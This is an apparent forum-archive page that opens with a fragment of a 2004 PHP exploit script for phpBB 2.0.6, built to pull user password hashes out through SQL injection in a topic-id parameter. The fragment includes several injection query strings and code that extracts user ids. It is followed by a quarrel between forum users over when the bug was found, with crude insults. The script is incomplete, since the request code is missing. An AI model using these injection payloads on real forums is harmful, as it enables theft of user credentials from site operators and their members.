<?php /* # phpBB 2.0.6 fetch password hash by pokleyzz <pokleyzz at scan-associates.net> # 4th January 2004 : 3:05 a.m # # bug found by pokleyzz (4th January 2004 ) # # Requirement: # PHP 4.x with curl extension; # # Greet: # tynon, sk ,wanvadder, sir_flyguy, wxyz , tenukboncit, kerengga_kurus , # s0cket370 , b0iler and ... # # # ---------------------------------------------------------------------------- # "TEH TARIK-WARE LICENSE" (Revision 1): # wrote this file. As long as you retain this notice you # can do whatever you want with this stuff. If we meet some day, and you think # this stuff is worth it, you can buy me a "teh tarik" in return. # ---------------------------------------------------------------------------- # (Base on Poul-Henning Kamp Beerware) # # Tribute to Search + Wings - "gemuruh.mp3" :P # */
// get userid and data cookie name //$sql="$topic_id)+AND+pt.post_id=p.post_id+AND+f.forum_id=p.forum_id+AND+p.topic_id=t.topic_id+AND+p.poster_id=u.user_id+and+u.username={$cusername}+ORDER+BY+p.post_time+DESC+LIMIT+0,2/*"; //$sql="99999)+or+(+p.forum_id=$topic_id+and+pt.post_id=p.post_id+AND+f.forum_id=p.forum_id+AND+p.topic_id=t.topic_id+AND+p.poster_id=u.user_id+and+u.username={$cusername}+)+ORDER+BY+p.post_time+DESC+LIMIT+0,15/*"; //$sql="999999)+or+(u.username={$cusername})+LIMIT+0,2/*"; $sql = "$topic_id)+AND+t.topic_poster=u.user_id+AND+f.forum_id=t.forum_id+AND+p.post_id=t.topic_first_post_id+AND+p2.post_id=t.topic_last_post_id+AND+u2.user_id=p2.poster_id+and+u.username={$cusername}+LIMIT+0,2/*";
if (preg_match("/mode=viewprofile&u=.*>$username/i",$res,$ap)){ preg_match("/mode=viewprofile&u=[0-9]+/i",$ap[0],$ap2); $userid=preg_replace("/mode=viewprofile&u=/","",$ap2[0]); echo $userid; } else { echo "\n[x] Error occur... no result for this topic id\n"; exit(); }
echo "Take your time for Teh Tarik... please wait ...\n\n"; echo "Result:\n";
Little hint Lanig. Dont think you are the best, and is always like this bad smelling asshole. I dont see that exploit posted, CAN YOU SEE ? No, cause that exploit was published at the Date: 2004-03-27.. (Security-Corporation) < If you dont believe me. Thank you for NOT reading his post.. The vulnerability was found in January.. So your just a jackass that has fart on a girl.. Thank you...
Lanig
Mar 28 2004, 10:37 PM
hmm thats very nice spikie, just to let u know i looked at the sql injection one and i havnt seen any new bugs in phpbb 2.0.6 search.php but i do remember one that was published a few months ago i thought that was it, if im wrong (and im still dont think i am) then correct me instead of throw ur unused anger at me aka "flaming"
EDIT: never mind... just saw the new exploit in security focus. hmm im sorry then
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.